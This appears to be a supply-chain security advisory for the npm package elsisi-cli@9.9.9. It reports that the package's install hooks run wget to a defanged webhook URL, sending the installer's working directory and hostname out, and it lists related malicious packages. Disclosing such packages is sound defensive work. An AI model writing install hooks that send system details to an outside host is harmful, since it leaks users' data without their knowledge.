elsisi-cli@9.9.9
Malicious code in elsisi-cli (npm)
T1195.002 · Compromise Software Supply Chain
Analysis
elsisi-cli@9.9.9 is an empty package (only package.json, 371 bytes) with preinstall and postinstall hooks that run `wget --quiet` to webhook[.]site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(pwd) and ?user=$(hostname), exfiltrating the installer's current working directory and hostname to a remote endpoint on every install.
- analyzed by
- Leitwacht
- first seen
- Jul 14, 2026, 02:46 AM
- analyzed
- Jul 14, 2026, 02:47 AM
Related advisories
- chai-as-auth@2.3.5
- polymarket-bot-logger@1.0.1
- @sqlite-panel/createsql@1.0.0
- type-swap@3.1.3
- test_adminet@99.9.9
- monitoring-service-util@1.0.0
- chai-as-verified@7.1.5
- polymarket-stake-kelly-math-check@3.5.2
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.